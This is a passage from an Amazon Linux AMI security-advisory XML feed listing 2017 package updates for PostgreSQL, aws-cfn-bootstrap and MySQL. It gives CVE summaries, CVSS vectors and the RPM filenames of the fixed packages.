release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython27-9.3.18-1.64.amzn1.i686.rpm</filename></package><package name="postgresql93-contrib" version="9.3.18" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-contrib-9.3.18-1.64.amzn1.i686.rpm</filename></package><package name="postgresql93" version="9.3.18" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-9.3.18-1.64.amzn1.i686.rpm</filename></package><package name="postgresql93-devel" version="9.3.18" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-devel-9.3.18-1.64.amzn1.i686.rpm</filename></package><package name="postgresql93-docs" version="9.3.18" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-docs-9.3.18-1.64.amzn1.i686.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.18" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-pltcl-9.3.18-1.64.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.18" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython26-9.3.18-1.64.amzn1.i686.rpm</filename></package><package name="postgresql93-libs" version="9.3.18" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-libs-9.3.18-1.64.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.18" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-server-9.3.18-1.64.amzn1.i686.rpm</filename></package><package name="postgresql93-plperl" version="9.3.18" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plperl-9.3.18-1.64.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.22" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-contrib-9.2.22-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.22" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-test-9.2.22-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.22" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-pltcl-9.2.22-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql92-libs" version="9.2.22" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-libs-9.2.22-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.22" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-compat-9.2.22-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.22" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-9.2.22-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.22" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plperl-9.2.22-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql92" version="9.2.22" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-9.2.22-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql92-devel" version="9.2.22" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-devel-9.2.22-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.22" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-debuginfo-9.2.22-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.22" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython26-9.2.22-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql92-docs" version="9.2.22" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-docs-9.2.22-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.22" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython27-9.2.22-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.22" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-9.2.22-1.61.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.22" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython27-9.2.22-1.61.amzn1.i686.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.22" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-debuginfo-9.2.22-1.61.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.22" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-contrib-9.2.22-1.61.amzn1.i686.rpm</filename></package><package name="postgresql92" version="9.2.22" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-9.2.22-1.61.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.22" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython26-9.2.22-1.61.amzn1.i686.rpm</filename></package><package name="postgresql92-docs" version="9.2.22" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-docs-9.2.22-1.61.amzn1.i686.rpm</filename></package><package name="postgresql92-libs" version="9.2.22" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-libs-9.2.22-1.61.amzn1.i686.rpm</filename></package><package name="postgresql92-devel" version="9.2.22" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-devel-9.2.22-1.61.amzn1.i686.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.22" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-pltcl-9.2.22-1.61.amzn1.i686.rpm</filename></package><package name="postgresql92-plperl" version="9.2.22" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plperl-9.2.22-1.61.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.22" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-compat-9.2.22-1.61.amzn1.i686.rpm</filename></package><package name="postgresql92-test" version="9.2.22" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-test-9.2.22-1.61.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-885</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-885: medium priority package update for postgresql94 postgresql95</title><issued date="2017-08-31 16:22:00" /><updated date="2017-08-31 23:13:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7548:
An authorization flaw was found in the way PostgreSQL handled large objects. A remote authenticated attacker with no privileges on a large object could potentially use this flaw to overwrite the entire content of the object, thus resulting in denial of service.
1477187:
CVE-2017-7548 postgresql: lo_put() function ignores ACLs
CVE-2017-7547:
An authorization flaw was found in the way PostgreSQL handled access to the pg_user_mappings view on foreign servers. A remote authenticated attacker could potentially use this flaw to retrieve passwords from the user mappings defined by the foreign server owners without actually having the privileges to do so.
1477185:
CVE-2017-7547 postgresql: pg_user_mappings view discloses passwords to users lacking server privileges
CVE-2017-7546:
It was found that authenticating to a PostgreSQL database account with an empty password was possible despite libpq&#039;s refusal to send an empty password. A remote attacker could potentially use this flaw to gain access to database accounts with empty passwords.
1477184:
CVE-2017-7546 postgresql: Empty password accepted in some authentication methods
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7546" title="" id="CVE-2017-7546" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7547" title="" id="CVE-2017-7547" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7548" title="" id="CVE-2017-7548" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql94" version="9.4.13" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-9.4.13-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.13" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-debuginfo-9.4.13-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.13" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython27-9.4.13-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql94-devel" version="9.4.13" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-devel-9.4.13-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql94-docs" version="9.4.13" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-docs-9.4.13-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.13" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython26-9.4.13-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql94-test" version="9.4.13" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-test-9.4.13-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plperl" version="9.4.13" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plperl-9.4.13-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql94-server" version="9.4.13" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-server-9.4.13-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql94-contrib" version="9.4.13" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-contrib-9.4.13-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql94-libs" version="9.4.13" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-libs-9.4.13-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.13" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython26-9.4.13-1.69.amzn1.i686.rpm</filename></package><package name="postgresql94-contrib" version="9.4.13" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-contrib-9.4.13-1.69.amzn1.i686.rpm</filename></package><package name="postgresql94-plperl" version="9.4.13" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plperl-9.4.13-1.69.amzn1.i686.rpm</filename></package><package name="postgresql94-server" version="9.4.13" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-server-9.4.13-1.69.amzn1.i686.rpm</filename></package><package name="postgresql94-devel" version="9.4.13" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-devel-9.4.13-1.69.amzn1.i686.rpm</filename></package><package name="postgresql94" version="9.4.13" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-9.4.13-1.69.amzn1.i686.rpm</filename></package><package name="postgresql94-libs" version="9.4.13" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-libs-9.4.13-1.69.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.13" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython27-9.4.13-1.69.amzn1.i686.rpm</filename></package><package name="postgresql94-test" version="9.4.13" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-test-9.4.13-1.69.amzn1.i686.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.13" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-debuginfo-9.4.13-1.69.amzn1.i686.rpm</filename></package><package name="postgresql94-docs" version="9.4.13" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-docs-9.4.13-1.69.amzn1.i686.rpm</filename></package><package name="postgresql95" version="9.5.8" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-9.5.8-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql95-libs" version="9.5.8" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-libs-9.5.8-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql95-contrib" version="9.5.8" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-contrib-9.5.8-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql95-docs" version="9.5.8" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-docs-9.5.8-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plperl" version="9.5.8" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plperl-9.5.8-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql95-devel" version="9.5.8" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-devel-9.5.8-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql95-test" version="9.5.8" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-test-9.5.8-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.8" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython26-9.5.8-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.8" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython27-9.5.8-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql95-server" version="9.5.8" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-server-9.5.8-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.8" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-debuginfo-9.5.8-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql95-static" version="9.5.8" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-static-9.5.8-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.8" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-debuginfo-9.5.8-1.73.amzn1.i686.rpm</filename></package><package name="postgresql95-test" version="9.5.8" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-test-9.5.8-1.73.amzn1.i686.rpm</filename></package><package name="postgresql95-plperl" version="9.5.8" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plperl-9.5.8-1.73.amzn1.i686.rpm</filename></package><package name="postgresql95-libs" version="9.5.8" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-libs-9.5.8-1.73.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.8" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython26-9.5.8-1.73.amzn1.i686.rpm</filename></package><package name="postgresql95-static" version="9.5.8" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-static-9.5.8-1.73.amzn1.i686.rpm</filename></package><package name="postgresql95-devel" version="9.5.8" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-devel-9.5.8-1.73.amzn1.i686.rpm</filename></package><package name="postgresql95-contrib" version="9.5.8" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-contrib-9.5.8-1.73.amzn1.i686.rpm</filename></package><package name="postgresql95-server" version="9.5.8" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-server-9.5.8-1.73.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.8" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython27-9.5.8-1.73.amzn1.i686.rpm</filename></package><package name="postgresql95-docs" version="9.5.8" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-docs-9.5.8-1.73.amzn1.i686.rpm</filename></package><package name="postgresql95" version="9.5.8" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-9.5.8-1.73.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-886</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-886: important priority package update for aws-cfn-bootstrap</title><issued date="2017-08-31 17:03:00" /><updated date="2024-02-10 00:46:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-9450:
The Amazon Web Services (AWS) CloudFormation bootstrap tools package (aka aws-cfn-bootstrap) before 1.4-19.10 allows local users to execute arbitrary code with root privileges by leveraging the ability to create files in an unspecified directory.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9450" title="" id="CVE-2017-9450" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="aws-cfn-bootstrap" version="1.4" release="21.13.amzn1" epoch="0" arch="noarch"><filename>Packages/aws-cfn-bootstrap-1.4-21.13.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-887</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-887: medium priority package update for mysql55</title><issued date="2017-08-31 17:08:00" /><updated date="2017-08-31 23:29:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3653:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.56 and earlier, 5.6.36 and earlier and 5.7.18 and earlier. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N).
1472711:
CVE-2017-3653 mysql: Server: DDL unspecified vulnerability (CPU Jul 2017)
CVE-2017-3652:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.56 and earlier, 5.6.36 and earlier and 5.7.18 and earlier. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data as well as unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 4.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N).
1472710:
CVE-2017-3652 mysql: Server: DDL unspecified vulnerability (CPU Jul 2017)
CVE-2017-3651:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client mysqldump). Supported versions that are affected are 5.5.56 and earlier, 5.6.36 and earlier and 5.7.18 and earlier. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N).
1472708:
CVE-2017-3651 mysql: Client mysqldump unspecified vulnerability (CPU Jul 2017)
CVE-2017-3648:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Charsets). Supported versions that are affected are 5.5.56 and earlier, 5.6.36 and earlier and 5.7.18 and earlier. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1472704:
CVE-2017-3648 mysql: Server: Charsets unspecified vulnerability (CPU Jul 2017)
CVE-2017-3641:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.5.56 and earlier, 5.6.36 and earlier and 5.7.18 and earlier. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1472693:
CVE-2017-3641 mysql: Server: DML unspecified vulnerability (CPU Jul 2017)
CVE-2017-3636:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.56 and earlier and 5.6.36 and earlier. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data as well as unauthorized read access to a subset of MySQL Server accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Server. CVSS 3.0 Base Score 5.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L).
1472686:
CVE-2017-3636 mysql: Client programs unspecified vulnerability (CPU Jul 2017)
CVE-2017-3635:
Vulnerability in the MySQL Connectors component of Oracle MySQL (subcomponent: Connector/C). Supported versions that are affected are 6.1.10 and earlier. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Connectors. Note: The documentation has also been updated for the correct way to use mysql_stmt_close(). Please see: https://dev.mysql.com/doc/refman/5.7/en/mysql-stmt-execute.html, https://dev.mysql.com/doc/refman/5.7/en/mysql-stmt-fetch.html, https://dev.mysql.com/doc/refman/5.7/en/mysql-stmt-close.html, https://dev.mysql.com/doc/refman/5.7/en/mysql-stmt-error.html, https://dev.mysql.com/doc/refman/5.7/en/mysql-stmt-errno.html, and https://dev.mysql.com/doc/refman/5.7/en/mysql-stmt-sqlstate.html. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H).
1472685:
CVE-2017-3635 mysql: C API unspecified vulnerability (CPU Jul 2017)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3635" title="" id="CVE-2017-3635" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3636" title="" id="CVE-2017-3636" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3641" title="" id="CVE-2017-3641" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3648" title="" id="CVE-2017-3648" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3651" title="" id="CVE-2017-3651" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3652" title="" id="CVE-2017-3652" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3653" title="" id="CVE-2017-3653" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql55-debuginfo" version="5.5.57" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.57-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.57" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.57-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql55-test" version="5.5.57" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.57-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.57" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.57-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.57" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.57-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql-config" version="5.5.57" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-config-5.5.57-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.57" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.57-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.57" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.57-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.57" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.57-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.57" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.57-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.57" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.57-1.18.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.57" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.57-1.18.amzn1.i686.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.57" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.57-1.18.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.57" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.57-1.18.amzn1.i686.rpm</filename></package><package name="mysql55-server" version="5.5.57" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.57-1.18.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.57" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.57-1.18.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.57" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.57-1.18.amzn1.i686.rpm</filename></package><package name="mysql55-embedded" version="5.5.57" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.57-1.18.amzn1.i686.rpm</filename></package><package name="mysql55" version="5.5.57" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.57-1.18.amzn1.i686.rpm</filename></package><package name="mysql-config" version="5.5.57" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-config-5.5.57-1.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-888</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-888: medium priority package update for mysql56</title><issued date="2017-08-31 17:11:00" /><updated date="2017-08-31 23:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3653:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.56 and earlier, 5.6.36 and earlier and 5.7.18 and earlier. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N).
1472711:
CVE-2017-3653 mysql: Server: DDL unspecified vulnerability (CPU Jul 2017)
CVE-2017-3652:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.56 and earlier, 5.6.36 and earlier and 5.7.18 and earlier. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data as well as unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 4.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N).
1472710:
CVE-2017-3652 mysql: Server: DDL unspecified vulnerability (CPU Jul 2017)
CVE-2017-3651:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client mysqldump). Supported versions that are affected are 5.5.56 and earlier, 5.6.36 and earlier and 5.7.18 and earlier. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N).
1472708:
CVE-2017-3651 mysql: Client mysqldump unspecified vulnerability (CPU Jul 2017)
CVE-2017-3649:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.6.36 and earlier and 5.7.18 and earlier. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
